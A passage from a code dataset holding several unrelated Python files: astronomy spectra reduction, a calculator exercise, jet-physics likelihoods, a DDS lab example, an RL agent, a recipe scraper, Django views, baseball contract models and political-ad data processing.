print('\\n'+'Extracting Spectra...')\n iraf.apall(input=n+'[0][0]', output=n+'.ms',apertur=1,interac='yes',find='yes',nfind=1,recente='yes',resize='yes',background='fit')\n \n print('\\n'+'Editing the header to point to the wavelength calibration...')\n iraf.hedit(images=n+'.ms', addonly='yes',fields='REFSPEC1', value='arc.ms')\n \n print('\\n'+'Applying the dispersion correction...')\n iraf.dispcor(input=n+'.ms',output=n+'.w')\n \n print('\\n'+'Wavelength calibrated spectrum output as '+ n+'.w.fits')\n \n\nprint('\\nBeginning flux calibration...')\n \n## create the speclist but importing all fits files in folder but rejecting the sensfunc file\nfile_list = glob.glob('./*.fits');file_list.sort()\nfinal=[]\nfor j in range(len(file_list)):\n if 'fits.w.fits' in file_list[j]: \n final.append(file_list[j])\n \nnp.savetxt('./speclist',final,fmt=\"%s\")\n\n## extract the date. file_list[3] is used because arc.fits, arc.ms.fits, and the sensfile take up the first three positions\ndate=''\nit=0\nfor j in range(len(file_list[3])):\n if file_list[3][j]=='_':\n it+=1\n if it == 2 and file_list[3][j]!='_':\n date = date+file_list[3][j]\nprint('Date = '+ date)\n\nif flux_calibrate != 'n': \n ## begin IRAFing\n \n print('\\n'+'Setting airmass...')\n iraf.setairmass('@speclist', observ='lapalma', ra='cat-ra', dec='cat-dec', equi='cat-equi', st='lst', ut='utstart') \n \n print('\\n'+'Combining spectra...') \n iraf.scombine(input='@speclist',output='allspec',group='all',combine='median', gain = 2.45, reject='crreject',lthresh=1e-30, hthresh=hthresh2)\n \n print('\\n'+'Applying flux calibration to sensitivity function...') \n iraf.calibrate('@speclist', 'allspeccal', obs='lapalma', sens=sensfile,extinct='no', ignoreaps='yes') ## If extinct='yes', try extinction ='onedstds$ctioextinct.dat'\n \n print('\\n'+'Extracting the 1D spectra from the calibrated multispec file...') \n iraf.scopy('allspeccal[0]', 'allspeccal2', format='onedspec', w1=4000,w2=8000, rebin='no')\n \n \n print('\\n'+'1D spectrum output...')\n iraf.wspectext('allspeccal2.0001', obj+'_'+date+'.txt',header='no')\n \n print('\\n'+'Tidying up...')\n a = glob.glob('./*')\n for f in a:\n if 'allspec' in f:\n os.remove(f)\n \nif apply_flux_correction != 'n':\n \n s = np.loadtxt('./ManualExtractionFluxCorrections.txt',unpack=True, usecols=(0,1))\n \n file_to_use = obj+'_'+date+'.txt'\n print('\\n'+'Using '+ file_to_use+' as reference...')\n a=np.loadtxt('./'+file_to_use,unpack=True)\n \n for q in range(len(a[0])):\n find = np.argmin(abs(s[0]-a[0][q]))\n a[1][q] = a[1][q]*s[1][find]\n\n \n print('\\n'+file_to_use + ' corrected to ManualExtractionFluxCorrections.txt')\n master = zip(a[0],a[1])\n\n ### Save the corrected spectrum\n np.savetxt('./'+file_to_use[:-4]+'.w.txt',master,fmt=\"%s\")\n \n ### Load the corrected spectrum\n n = np.loadtxt('./'+file_to_use[:-4]+'.w.txt',dtype='float',unpack=True)\n \n ### Plot the corrected and dereddened spectrum\n import matplotlib.pyplot as plt\n m = np.max(a[1])\n a[1] = dered(a[0],a[1],3.1,E)\n plt.plot(a[0]/(1.+z),a[1]/max(a[1]),color='k',linewidth=1,label=obj+'\\n$z='+str(z)+'$')\n \n ### if necessary plot the galaxy lines\n if plotgal != 'n':\n l = [6548,6583, 4959,5007,5890,6717,6731]\n for line in l:\n ys = np.linspace(0,1.)\n xs = [line for op in ys]\n plt.plot(xs,ys,color='grey',linestyle='dotted',zorder=0,linewidth=0.7)\n l = [6563,4861,4341,4100]\n for line in l:\n ys = np.linspace(0,1.)\n xs = [line for op in ys]\n plt.plot(xs,ys,color='red',linestyle='dashed',zorder=0,linewidth=0.7)\n \n if plotvel !='n':\n l = [6355]\n for line in l:\n ys = np.linspace(0,1.)\n xs = [dop(line,velocity) for op in ys]\n plt.plot(xs,ys,color='green',linestyle='dashed',zorder=0,linewidth=0.7)\n \n \n plt.legend()\n plt.ylim([0,1.1])\n plt.xlabel('Rest-frame wavelength [$\\AA$]')\n plt.ylabel('Scaled flux')\n plt.savefig('./'+obj+'.pdf',bbox_inches='tight')\n plt.close()\n \n \n ### Compare the two spectra\n a = np.loadtxt(file_to_use,unpack=True)\n plt.plot(a[0]/(1.+z),a[1]/max(a[1]),color='k',alpha=1,linewidth=1,label='Original')\n a = np.loadtxt(file_to_use[:-4]+'.w.txt',unpack=True)\n plt.plot(a[0]/(1.+z),a[1]/max(a[1]),color='red',alpha=0.7,linewidth=1,label='Corrected')\n plt.legend()\n plt.xlabel('Rest-frame wavelength [$\\AA$]')\n plt.ylabel('Scaled flux')\n plt.savefig('./'+obj+'_compare.pdf',bbox_inches='tight')\n plt.close()","sub_path":"SPRATManualExtraction.py","file_name":"SPRATManualExtraction.py","file_ext":"py","file_size_in_byte":8114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"368528802","text":"# Curso em Vídeo Python 3 - Exercicio 59\n# Calculadora básica\n\nfrom time import sleep\nprint('{}CALCULADORA{}'.format('-'*6, '-'*6))\nnum1 = float(input('Primeiro valor: '))\nnum2 = float(input('Segundo valor: '))\nopc = 0\n\nwhile opc != 5:\n print('''OPERAÇÕES\n [ 1 ] SOMAR\n [ 2 ] MULTIPLICAR\n [ 3 ] MAIOR\n [ 4 ] NOVOS NUMEROS\n [ 5 ] SAIR''')\n opc = int(input('Opção: '))\n\n if opc == 1:\n soma = num1 + num2\n print('A soma dos numeros é: {}'.format(soma))\n elif opc == 2:\n mult = num1 * num2\n print('O produto dos numeros é: {}'.format(mult))\n elif opc == 3:\n if num1 > num2:\n print('O maior numero é: {}'.format(num1))\n elif num1 < num2:\n print('O maior numero é: {}'.format(num2))\n else:\n print('Os numeros são iguais: {}'.format(num1))\n elif opc == 4:\n num1 = float(input('Primeiro valor: '))\n num2 = float(input('Segundo valor: '))\n elif opc == 5:\n print('Fechando programa...')\n sleep(2)\n else:\n print('Opção inválida')\n print('-'*23)\n","sub_path":"Mundo 2/Exercicios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525816919","text":"import pickle\nimport numpy as np\nimport torch\n\n\ndef get_delta_LR(pL, pR):\n \"\"\"\n Calculate delta of an edge, given its child momenta\n \"\"\"\n return np.sqrt(np.sum((pR / 2 - pL / 2) ** 2))\n\n\ndef get_delta_PC(p, pC):\n \"\"\"\n Calculate delta of an edge, given its momentum and the momentum of a child\n \"\"\"\n return np.sqrt(np.sum((p / 2 - pC) ** 2))\n\n\n\n\n\n\n\n\n\n\ndef split_logLH(pL, delta_L, pR, delta_R, delta_min, lam):\n \"\"\"\n Takes two edges (p, delta) and\n return the splitting that generated them (p, delta_P, phi)\n with its log likelihood\n \"\"\"\n p = pR + pL\n delta_vec = (pR - pL) / 2\n phi = np.arctan2(delta_vec[0], delta_vec[1])\n delta_P = get_delta_LR(pL, pR)\n\n def get_p(delta_P, delta, delta_min, lam):\n if delta > 0:\n # r = delta / delta_P\n return np.log(lam) - np.log(delta_P) - lam * delta / delta_P\n else:\n # r = delta_min / delta_P\n return np.log(1 - np.exp(-lam * delta_min / delta_P))\n\n logLH = (\n get_p(delta_P, delta_L, delta_min, lam)\n + get_p(delta_P, delta_R, delta_min, lam)\n + np.log(1 / 2 / np.pi)\n )\n\n if delta_P < delta_min:\n logLH = - np.inf\n\n return logLH, p, delta_P, phi\n\n\n\n\ndef Basic_split_logLH(pL, delta_L, pR, delta_R, delta_min, lam):\n \"\"\"\n Takes two edges (p, delta) and\n return the splitting that generated them (p, delta_P, phi)\n with its log likelihood\n\n Note: Leaves in the Toy Generative Model are assigned Delta=0\n \"\"\"\n\n delta_P = get_delta_LR(pL, pR)\n\n # Get logLH\n def get_p(delta_P, delta, delta_min, lam):\n if delta > 0:\n # r = delta / delta_P\n return np.log(lam) - np.log(delta_P) - lam * delta / delta_P\n else:\n \"\"\" We set Delta=0 if the node is a leaf \"\"\"\n # r = delta_min / delta_P\n return np.log(1 - np.exp(-lam * delta_min / delta_P))\n\n if delta_P < delta_min:\n logLH = - np.inf\n\n else:\n\n logLH = (\n get_p(delta_P, delta_L, delta_min, lam)\n + get_p(delta_P, delta_R, delta_min, lam)\n + np.log(1 / 2 / np.pi)\n )\n\n return logLH\n\n\n\n\n\n\n\ndef fill_jet_info(jet, parent_id=None):\n \"\"\"\n Fill jet[\"deltas\"] amd jet[\"draws\"] given jet[\"tree\"] and jet[\"content\"]\n Assing r = None to the root and the leaves, and assign delta = 0 to the leaves\n \"\"\"\n deltas = []\n draws = []\n\n root_id = jet[\"root_id\"]\n\n _get_jet_info(jet, root_id=root_id, parent_id=parent_id, deltas=deltas, draws=draws)\n\n jet[\"deltas\"] = deltas\n jet[\"draws\"] = draws\n\n return jet\n\ndef _get_jet_info(jet, root_id=None, parent_id=None, deltas=None, draws=None):\n \"\"\"\n Recursion to fill jet[\"deltas\"] amd jet[\"draws\"]\n \"\"\"\n\n if jet[\"tree\"][root_id][0] != -1 and jet[\"tree\"][root_id][1] != -1:\n\n idL = jet[\"tree\"][root_id][0]\n idR = jet[\"tree\"][root_id][1]\n pL = jet[\"content\"][idL]\n pR = jet[\"content\"][idR]\n delta = get_delta_LR(pL, pR)\n if parent_id is not None:\n delta_parent = deltas[parent_id]\n r = torch.tensor(delta / delta_parent)\n else:\n r = None\n\n deltas.append(delta)\n draws.append(r)\n\n _get_jet_info(jet, root_id=idL, parent_id=root_id, deltas=deltas, draws=draws)\n _get_jet_info(jet, root_id=idR, parent_id=root_id, deltas=deltas, draws=draws)\n\n else:\n if jet[\"tree\"][root_id][0] * jet[\"tree\"][root_id][1] != 1:\n raise ValueError(f\"Invalid jet left and right child are not both -1\")\n else:\n deltas.append(0)\n draws.append(None)\n\n\ndef enrich_jet_logLH(jet, Lambda=None, delta_min=None, dij=False, alpha = None):\n \"\"\"\n Attach splitting log likelihood to each edge, by calling recursive\n _get_jet_likelihood.\n \"\"\"\n logLH = []\n dijList = []\n\n root_id = jet[\"root_id\"]\n\n if Lambda is None:\n Lambda = float(jet.get(\"Lambda\"))\n if Lambda is None:\n raise ValueError(f\"No Lambda specified by the jet.\")\n if delta_min is None:\n delta_min = jet.get(\"pt_cut\")\n if delta_min is None:\n raise ValueError(f\"No pt_cut specified by the jet.\")\n\n _get_jet_logLH(\n jet,\n root_id = root_id,\n Lambda = Lambda,\n delta_min = delta_min,\n logLH = logLH,\n dij = dij,\n dijList = dijList,\n alpha = alpha,\n )\n\n jet[\"logLH\"] = np.asarray(logLH)\n jet[\"dij\"] = dijList\n\n return jet\n\n\ndef _get_jet_logLH(\n jet,\n root_id = None,\n Lambda = None,\n delta_min = None,\n logLH = None,\n dij = False,\n dijList = None,\n alpha = None\n):\n \"\"\"\n Recursively enrich every edge from root_id downward with their log likelihood.\n log likelihood of a leaf is 0. Assumes a valid jet.\n \"\"\"\n if jet[\"tree\"][root_id][0] != -1:\n\n\n idL = jet[\"tree\"][root_id][0]\n idR = jet[\"tree\"][root_id][1]\n pL = jet[\"content\"][idL]\n pR = jet[\"content\"][idR]\n delta_L = jet[\"deltas\"][idL]\n delta_R = jet[\"deltas\"][idR]\n\n # print(delta_L, delta_R, Lambda)\n # print(\"---\"*5)\n # p_P =jet[\"content\"][root_id]\n\n\n # if jet[\"tree\"][idL][0] !=-1:\n #\n # delta_L = get_delta_PC(pL, jet[\"content\"][jet[\"tree\"][idL][0]])\n #\n # if jet[\"tree\"][idR][0] != -1:\n # delta_R = get_delta_PC(pR, jet[\"content\"][jet[\"tree\"][idR][0]])\n\n\n #\n # print(delta_L, delta_R, Lambda)\n\n # jet[\"deltas\"][idL] = delta_L\n # jet[\"deltas\"][idR] = delta_R\n\n # print(idL, idR,pL,pR,delta_L,delta_R, delta_min, Lambda)\n\n \n\n # p_P =jet[\"content\"][root_id]\n # delta_L = get_delta_PC(p_P, pL)\n # delta_R = get_delta_PC(p_P, pR)\n # print(idL, idR,pL,pR,delta_L,delta_R, delta_min, Lambda)\n\n\n\n\n llh, _ , _ , _ = split_logLH(pL, delta_L, pR, delta_R, delta_min, Lambda)\n logLH.append(llh)\n # print('logLH = ', llh)\n\n if dij:\n\n \"\"\" dij=min(pTi^(2 alpha),pTj^(2 alpha)) * [arccos((pi.pj)/|pi|*|pj|)]^2 \"\"\"\n # epsilon = 1e-6 # For numerical stability\n dijs= [float(llh)]\n\n for alpha in [-1,0,1]:\n\n tempCos = np.dot(pL, pR) / (np.linalg.norm(pL) * np.linalg.norm(pR))\n if abs(tempCos) > 1: tempCos = np.sign(tempCos)\n\n dijVal = np.sort((np.abs([pL[0],pR[0]])) ** (2 * alpha))[0] * \\\n (\n np.arccos(tempCos)\n ) ** 2\n\n dijs.append(dijVal)\n\n dijList.append(dijs)\n\n\n _get_jet_logLH(\n jet,\n root_id = idL,\n Lambda = Lambda,\n delta_min = delta_min,\n logLH = logLH,\n dij = dij,\n dijList = dijList,\n alpha = alpha,\n )\n _get_jet_logLH(\n jet,\n root_id = idR,\n Lambda = Lambda,\n delta_min = delta_min,\n logLH = logLH,\n dij = dij,\n dijList = dijList,\n alpha = alpha,\n )\n\n else:\n\n logLH.append(0)\n\n\n","sub_path":"showerSim/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":7215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"425589207","text":"import logging\nimport sys\nsys.path.append('../')\n\nfrom wieserlabsdds import WieserlabsClient\n\n\"\"\"\nThis example ramps the frequency of slot 0, channel 0 from 1MHz to 2MHz over the\nspan of one second. Connect to spectrum analyzer to see the result.\n\"\"\"\n\nclient = WieserlabsClient(\"10.0.0.237\", max_amp=17.38, loglevel=logging.INFO)\nclient.reset(0)\nclient.run(0)\n\nclient.frequency_ramp(slot_index=0, channel=0,\n fstart=1e6, fend=2e6,\n amp=1,\n phase=0,\n tramp=1,\n fstep=1, is_filter=False)\n\nclient.run(0)\n","sub_path":"examples/frequency_ramp.py","file_name":"frequency_ramp.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"387387348","text":"from collections import deque\nimport random\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as pyplot\nfrom matplotlib import style\nimport objgraph\n\n\n\nclass TrainingAgent:\n def __init__(self, network_update_period,tau=0.1, model=None, epsilon=1, epsilon_decay=0.01, min_epsilon=0, gamma=0.99, runs=100, batch_size=10,\n steps_per_run=None):\n self.model = model\n self.memory = Memory(batch_size)\n self.epsilon = epsilon\n self.batch_size = batch_size\n self.epsilon_decay = epsilon_decay\n self.min_epsilon = min_epsilon\n self.gamma = gamma\n self.tau=tau\n self.runs = runs\n self.step_per_run = steps_per_run\n self.network_update_period=network_update_period\n self.actor = keras.Sequential(\n [\n keras.layers.Dense(128, input_dim=model.state_dim, activation=\"relu\"),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dense(128, activation=\"relu\"),\n keras.layers.Dense(model.action_dim, activation=\"linear\")\n ]\n )\n self.critic = keras.Sequential(\n [\n keras.layers.Dense(128, input_dim=model.state_dim, activation=\"relu\"),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dense(128, activation=\"relu\"),\n keras.layers.Dense(model.action_dim, activation=\"linear\")\n ]\n )\n\n# filepath=\"model.hdf5\"\n# checkpoint = keras.callbacks.ModelCheckpoint(filepath, monitor='accuracy', verbose=0, save_best_only=True, mode='max')\n# self.callbacks_list = [checkpoint]\n self.actor.compile(optimizer=\"adam\", loss=\"mse\", metrics=[\"accuracy\"])\n self.critic.compile(optimizer=\"adam\", loss=\"mse\", metrics=[\"accuracy\"])\n\n\n def run(self):\n run_rewards = []\n for run in range(self.runs):\n #print(\"Run # \", run)\n total_reward = 0\n self.epsilon=1-(float(run)/float(self.runs))\n current_state = self.model.initial_state\n terminate = False\n train_step_count = 0\n update_step_count=0\n run_step_count = 0\n while not terminate:\n action = 0\n #print(\"Day \",run_step_count)\n \n# if(run_step_count % self.batch_size ==0 or True):\n# #print(objgraph.show_most_common_types())\n# #print(objgraph.count('tuple'))\n# print(\"Day \",run_step_count)\n# print(objgraph.show_growth(limit=10))\n# all_objects = muppy.get_objects()\n# sum1 = summary.summarize(all_objects)\n# # Prints out a summary of the large objects\n# summary.print_(sum1)\n if np.random.rand() <= self.epsilon:\n # Pick random action\n\n action = random.randrange(self.model.action_dim)\n #print(\"Picking Random action: \",action)\n else:\n # Best Action\n action = np.argmax(self.actor.predict(np.array([current_state]))[0])\n #print(\"Picking Best action: \", action)\n #print(action)\n state, action, next_state, reward, terminal = self.model.model_logic(current_state, action)\n total_reward += reward\n self.memory.append((state, action, next_state, reward, terminal))\n train_step_count += 1\n #update_step_count+=1\n if train_step_count == self.batch_size:\n self.replay_train()\n train_step_count = 0\n #if update_step_count == self.network_update_period:\n # self.critic.set_weights(self.actor.get_weights())\n # self.update_step_count=0\n \n current_state = next_state\n run_step_count += 1\n if self.step_per_run is not None and run_step_count >= self.step_per_run:\n terminate = True\n run_rewards.append(total_reward)\n print(run, \":\", total_reward,\":\",self.epsilon)\n style.use(\"ggplot\")\n pyplot.scatter(range(0, len(run_rewards)), run_rewards)\n pyplot.xlabel(\"Run\")\n pyplot.ylabel(\"Total Reward\")\n pyplot.show()\n\n def update_critic(self):\n\n c=np.array(self.critic.get_weights());\n a=np.array(self.actor.get_weights());\n c=(c*(1-self.tau)) + (a*self.tau)\n #print(c)\n #print(\"---------------------------------------------------------------------------------------------------------------\")\n #print(self.critic.get_weights())\n self.critic.set_weights(c)\n \n def replay_train(self):\n batch = self.memory.sample(self.batch_size)\n #x=[]\n #y=[]\n for state, action, next_state, reward, terminal in batch:\n target = reward\n\n if not terminal:\n #target = reward + self.gamma * np.amax(self.q_network.predict(np.array([next_state]))[0])\n act=np.argmax(self.actor.predict(np.array([next_state]))[0])\n arr=(self.critic.predict(np.array([next_state]))[0])\n #print(act)\n #print(arr)\n target = reward+self.gamma *(arr[act])\n #print(target)\n\n target_f = self.actor.predict(np.array([state]))\n target_f[0][action] = target\n #print(target_f)\n #x.append(state)\n #y.append(target_f[0])\n self.actor.fit(np.array([state]), target_f, epochs=1, verbose=0)\n \n self.update_critic()\n\n keras.backend.clear_session()\n #self.q_network.fit(np.array(x), np.array(y),batch_size=self.batch_size, epochs=1, verbose=0)\n\n # if self.epsilon > self.min_epsilon:\n # self.epsilon -= self.epsilon_decay\n # if self.epsilon < self.min_epsilon:\n # self.epsilon = self.min_epsilon\n # else:\n # self.epsilon = self.min_epsilon\n\n\nclass Memory:\n def __init__(self, max_size):\n self.memory = deque(maxlen=max_size)\n\n def append(self, element):\n self.memory.append(element)\n\n def sample(self, n):\n return random.sample(self.memory, n)\n","sub_path":"VMIwithDRL/src/agent_model/training_agent_double.py","file_name":"training_agent_double.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"611781855","text":"#! /usr/bin/env python3\n# Auth: Jennifer Chang\n# Auth: Michael Zeller\n# Date: 2018/04/05\n# -*- coding: utf-8 -*-\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport numpy as np\n\n# ============================= Functions\ndef probe_world_cuisine(year,br):\n # Scrape URLS for recipes\n urls = br.find_elements(By.CLASS_NAME, \"favorite\") \n id = []\n for i, e in enumerate(urls):\n id.append(e.get_attribute('data-id')) \n urls[i] = 'https://allrecipes.com/recipe/' + str(id[i])\n urls = np.unique(urls)\n id = np.unique(id)\n \n f = open(year+'.txt', 'w')\n \n # Fetch ingredients\n for i, url in enumerate(urls):\n br.get(url)\n print('website\\t'+url+'\\t'+year)\n #f.write('website\\t'+url+'\\t'+year+'\\n') # MZ: Avoid writing to file for easier processing; JC: agree\n time.sleep(3)\n scrape_recipe(br, year, id[i],f)\n \n f.close\n \n print(\"==== Saved to \"+year+\".txt\")\n \ndef scrape_recipe(br, year, idnumber,f):\n try:\n rtitle = br.find_element_by_tag_name('h1').text\n except:\n rtitle = 'NA'\n\n print('recipe\\t'+idnumber+'\\t'+rtitle+'\\t'+year)\n \n ingred = br.find_elements_by_class_name(\"checkList__item\")\n ingredients = []\n for x in np.arange(len(ingred)-1):\n #if (str(ingred[x].text) == '')\n ingredients.append(str(ingred[x].text.encode('ascii', 'ignore')).replace(\"b'\",\"\").replace(\"'\",\"\"))\n \n for ingr in ingredients:\n print('ingred\\t'+rtitle+'\\t'+idnumber+'\\t'+ingr+'\\t'+year)\n f.write('ingred\\t'+rtitle+'\\t'+idnumber+'\\t'+ingr+'\\t'+year+'\\n')\n \n# ============================= Main\n# Open browser\nbr=webdriver.Firefox() #opens Firefox browser \n\n# Choose country (or countries) by uncommenting their line (or lines)\nyear=[]\nyear.append(['Mexico','https://www.allrecipes.com/recipes/728/world-cuisine/latin-american/mexican'])\n#year.append(['Africa','https://www.allrecipes.com/recipes/226/world-cuisine/african'])\n#year.append(['England','https://www.allrecipes.com/recipes/705/world-cuisine/european/uk-and-ireland/english'])\n#year.append(['China\"','https://www.allrecipes.com/recipes/695/world-cuisine/asian/chinese'])\n#year.append(['Philippines','https://www.allrecipes.com/recipes/696/world-cuisine/asian/filipino'])\n#year.append(['France','https://www.allrecipes.com/recipes/721/world-cuisine/european/french'])\n#year.append(['Germany','https://www.allrecipes.com/recipes/722/world-cuisine/european/german'])\n#year.append(['India','https://www.allrecipes.com/recipes/233/world-cuisine/asian/indian'])\n#year.append(['Italy','https://www.allrecipes.com/recipes/723/world-cuisine/european/italian'])\n#year.append(['Japan','https://www.allrecipes.com/recipes/699/world-cuisine/asian/japanese/'])\n#year.append(['Korea','https://www.allrecipes.com/recipes/700/world-cuisine/asian/korean'])\n#year.append(['Pakistani','https://www.allrecipes.com/recipes/15974/world-cuisine/asian/pakistani'])\n#year.append(['Russia','https://www.allrecipes.com/recipes/716/world-cuisine/european/eastern-european/russian'])\n\n# Fetch recipes\nfor country in year:\n print('==== Fetching recipes from ',country[0])\n br.get(country[1])\n probe_world_cuisine(country[0],br)\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"547034860","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nimport electives.models as models\nfrom .review import UserReviewForm\nfrom django.shortcuts import redirect\n\n\n# View where one can search for electives\ndef search(request):\n all_electives = models.Elective.objects.all()\n return render(request, 'electives/search.html', {\n 'all_electives': all_electives,\n 'languages': models.Elective.LANGUAGE_CHOICES,\n 'utblocks': models.Elective.UT_BLOCK_CHOICES,\n 'elective_types': models.Elective.ELECTIVE_TYPE_CHOICES, })\n\n\n# View of search results\nclass SearchResultsView(ListView):\n template_name = 'electives/search_results.html'\n\n def get_queryset(self):\n \"\"\"Return all electives satisfying the search\"\"\"\n title = self.request.GET.get('title')\n ec = self.request.GET.get('ec')\n utblock = self.request.GET.get('utblock')\n language = self.request.GET.get('language')\n electivetype = self.request.GET.get('electivetype')\n osiriscode = self.request.GET.get('osiriscode')\n keywords = self.request.GET.get('keywords')\n result = models.search(title=title, ec=ec, utblock=utblock, language=language, electivetype=electivetype,\n osiriscode=osiriscode, keywords=keywords)\n return result\n\n\n# Detail view of an elective\nclass ElectiveDetailView(DetailView):\n model = models.Elective\n template_name = 'electives/detail.html'\n\n\ndef user_review_view(request):\n form = UserReviewForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('electives:thanks')\n context = {\n 'form': form \n }\n return render(request, \"electives/user_review.html\", context)\n\n\ndef thank_you_view(request, *args, **kwargs):\n return render(request, \"electives/thank_you.html\", {})\n","sub_path":"electives/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339040871","text":"# Import important packages (mostly sklearn)\nimport pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\n# Import GLM\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\n# Import RF\nfrom sklearn.ensemble import RandomForestClassifier\n# Import RSME\nfrom sklearn.metrics import mean_squared_error\n# Import Classification metrics\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\n# Load the saved data\ndef loadAllData():\n '''Load both saved data frames for use in the models'''\n\n # Load pitchers\n with open('/home/ubuntu/Github/MLB_FA_Predictor/mlb_flask_app/pitching_data.pickle', 'rb') as file:\n pitcher_all = pickle.load(file)\n\n # Load position players\n with open('/home/ubuntu/Github/MLB_FA_Predictor/mlb_flask_app/position_data.pickle', 'rb') as file:\n position_all = pickle.load(file)\n\n return pitcher_all, position_all\n\n# Define data preparation function\ndef prepareFreeAgentData(df):\n '''Given one of the 2 player data frames, prepare it for ML'''\n\n # Create position one-hot configuration\n df = pd.get_dummies(df, columns = ['Position'], prefix= ['Pos'])\n\n # Create Contract logical variable\n df['Contract'] = df.Dollars.notnull()\n\n # Create AAV variable\n df['AAV_2006'] = df.Dollars_2006.divide(df.Length)\n\n return df\n\n# Define the data splitting function\ndef splitDataByYear(df, year, player_type):\n\n # Break them into data frames and drop 2017 from training\n df_test = df[df.Year == year]\n df_train = df[(df.Year != year) & (df.Year != 2017)]\n\n # Determine the features\n if player_type == 'pitcher':\n features = ['Age', 'WAR_3', 'ERA', 'WHIP', 'K_9', 'HR_9', 'IPouts',\n 'W', 'SV', 'Med_WAR', 'Min_WAR', 'Pos_SP', 'Pos_RP']\n else:\n features = ['Age', 'WAR_3', 'G', 'OBP', 'SLG', 'HR', 'RBI', 'SB',\n 'Med_WAR', 'Min_WAR', 'Pos_C', 'Pos_1B', 'Pos_2B', 'Pos_3B',\n 'Pos_SS', 'Pos_LF', 'Pos_CF', 'Pos_RF', 'Pos_DH']\n\n # Create the 4 sets of data; X's are arrays, y's are DFs for now\n X_train = df_train[features].values\n X_test = df_test[features].values\n y_train = df_train[['AAV_2006','Length','Contract']]\n y_test = df_test[['AAV_2006','Length','Contract', 'Dollars']]\n\n return X_train, y_train, X_test, y_test \n\n# Define the contract function (LogisticRegression)\ndef predictContract(X_train, y_train, X_test):\n\n # Grab the y values\n y_train_values = y_train['Contract'].values\n \n # Designate a logistic regression model\n logr = LogisticRegression()\n\n # Train the model\n logr.fit(X_train, y_train_values)\n\n y_pred = logr.predict(X_test) \n \n return logr, y_pred\n\n# Define the length function (rf classification)\ndef predictLength(X_train, y_train, X_test):\n\n # Shorten training to only non-null dollars\n idx = y_train.AAV_2006.notnull()\n y_train = y_train[idx]\n X_train = X_train[idx]\n\n # Grab the y values\n y_train_values = y_train['Length'].values\n \n # Designate a logistic regression model\n rfc = RandomForestClassifier()\n\n # Train the model\n rfc.fit(X_train, y_train_values)\n\n y_pred = rfc.predict(X_test) \n \n return rfc, y_pred\n\n# Define the dollars function (linear regression)\ndef predictDollars(X_train, y_train, X_test):\n\n # Shorten training to only non-null dollars\n idx = y_train.AAV_2006.notnull()\n y_train = y_train[idx]\n X_train = X_train[idx]\n\n # Grab the y values\n y_train_values = y_train['AAV_2006'].values\n \n # Designate a logistic regression model\n lm = LinearRegression()\n\n # Train the model\n lm.fit(X_train, y_train_values)\n\n y_pred = lm.predict(X_test) \n \n return lm, y_pred\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"612209444","text":"from django.db import models\nfrom django.conf import settings\n\nfrom .base import BaseModel\n\n\nclass Device(BaseModel):\n ANDROID, IOS = range(2)\n DEVICE_TYPES = (\n (ANDROID, 'Android'),\n (IOS, 'iOS')\n )\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n related_name=\"devices\"\n )\n token = models.CharField(max_length=255)\n device_type = models.SmallIntegerField(\n choices=DEVICE_TYPES, default=ANDROID)\n","sub_path":"loto/apps/mobile_api/models/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"454019317","text":"import agate\nimport util\n\nio = '../../io/'\n\n# load in all boston data as type text\ntt = agate.Text()\n\ncol_names = ['network','market','start_time', 'end_time', 'archive_id','sponsor','candidate','embed_url']\ncol_types = [tt, tt, tt, tt, tt, tt, tt, tt]\n\nbos = agate.Table.from_csv(io + 'bos.csv', column_names = col_names, column_types = col_types)\n\nsponsors = agate.Table.from_csv(io + 'sponsors_manual.csv')\nnew_sponsors = bos.select(['sponsor']).distinct('sponsor')\n\n\ndef get_candidate_from_sponsors(row):\n sponsor_row = sponsors.find(lambda r: r['sponsor'] == row['sponsor'])\n if sponsor_row:\n return sponsor_row['candidate']\n return None\n\n\n# check if we need to manually add a new sponsor / candidate relationship\nif len(sponsors.rows) != len(new_sponsors.rows):\n new_sponsors.to_csv(io + 'sponsors_latest.csv')\n print('New sponsors added. Update sponsors_manual.csv to continue.')\n\nelse: \n # create proper EST units for start/end times\n # create links to video and transcript files\n # create for_candidate name\n \n date_pattern = '%Y-%m-%d %H:%M:%S'\n base_url = 'https://archive.org/download/'\n\n with_new_fields = bos.compute([\n ('start_time_est', \n agate.Formula(agate.DateTime(), lambda row: util.get_est(row['start_time'], date_pattern))\n ),\n ('end_time_est',\n agate.Formula(agate.DateTime(), lambda row: util.get_est(row['end_time'], date_pattern))\n 